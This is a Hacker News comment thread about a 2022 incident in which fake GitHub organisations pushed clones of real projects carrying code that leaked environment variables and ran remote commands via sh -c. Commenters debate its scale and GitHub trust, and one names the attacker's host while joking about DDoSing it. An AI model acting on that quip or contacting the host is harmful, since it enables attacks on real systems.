from Hacker News

Malicious code added to 35k GitHub repos, leaking user environments

by pcmonk on 8/3/22, 5:16 AM with 76 comments

  • by oefrha on 8/3/22, 7:27 AM

    What a garbage clickbait thread. From scary words like "attack", "infected", etc. you would think projects are compromised. But nothing is compromised. From wayyyyy down in the thread:

    > The attacker creates FAKE orgs/repos and pushes clones of LEGIT projects to github.

    Yeah, anyone can push anything to their own GitHub accounts/orgs, including malware. We know that.

    Save yourself some time. Flagged.

  • by raggi on 8/3/22, 6:18 AM

    This code does more than leak environments. The go code pulls down arbitrary text and passes it to sh -c, example: https://github.com/zerops-io/zcli/commit/0396ee57bc0e5e0b123...

  • by soruly on 8/3/22, 6:21 AM

    note that it's 35,613 code results, not 35k repos

    and 13K of the search results come from this org

    https://github.com/redhat-operator-ecosystem

  • by abctree on 8/3/22, 7:50 AM

    This is a consequence of centralization. The canonical project sites and repositories should not be on GitHub.

    Fanatics who believe otherwise will still clone those projects so that they are on sacred ground, but the practice should be frowned upon and fought against.

    Another detrimental effect of GitHub is that they have trained users to accept public "forks" (a misnomer) as the usual way to contribute even trivial patches. This lowers the bar for accepting and trusting non-official repositories.

    GitHub has devalued the brand of large projects and has introduced the age of industrialized software development by creating an addictive environment where software politicians thrive by manipulating their social networks and working on their personal brand.

  • by drekipus on 8/3/22, 5:50 AM

    This is that thing where people can put anyone in as the commit author, thus impersonating the original creator right?

    Seems like the solution is "don't just copy random github urls into your code" ?

  • by mcraiha on 8/3/22, 5:38 AM

    They have attacks for different programming languages and environments. So not just a single target (e.g. npm) attack.

  • by rollulus on 8/3/22, 7:35 AM

    While browsing the nanobox repo linked in the twitter thread I started to get 404s, so it looks like GitHub is on it. Edit: other repos have vanished as well now.

  • by jwilk on 8/3/22, 6:10 AM

    > So far found in projects including: crypto, golang, python, js, bash, docker, k8s

    Huh? What does that mean?

  • by muppetman on 8/3/22, 5:40 AM

    How would code like this make it into so many repos? People accepting pull requests and not properly reviewing them? Or is there something even worse about this attack?

  • by 3np on 8/3/22, 6:20 AM

    TL;DR: These are forks by unknown people containing malware. I see no indication in the linked thread of even a single successful compromise actually occurring, or malicious code making it into legitimate upstream projects.

  • by dustinmoris on 8/3/22, 8:01 AM

    Do we need verified orgs on GitHub now?

  • by thih9 on 8/3/22, 7:55 AM

    > Correction, 35k+ "code hits" on github, not infected repositories.

    Source: https://mobile.twitter.com/stephenlacy/status/15547180866572...

  • by bonzini on 8/3/22, 6:10 AM

    Somebody should DDoS ovz1.j19544519.pr46m.vps.myjino.ru... (mostly kidding)

  • by robertwt7 on 8/3/22, 7:01 AM

    how is this affecting people if the clone does not open PRs to the original one?

    so this will send data to the hacker's network if we clone and build the wrong repo right?

  • by rvz on 8/3/22, 5:50 AM

    Oh dear. This is a gigantic disaster.

    If lots of software released today haven't been pinning their versions on release (especially Electron apps) or signing their commits if they are open-source, then this is a chaotic supply chain attack waiting to happen and is more worse than I thought.

    But really it is yet, another reason to avoid GitHub entirely and just self-host using GitLab or Gitea.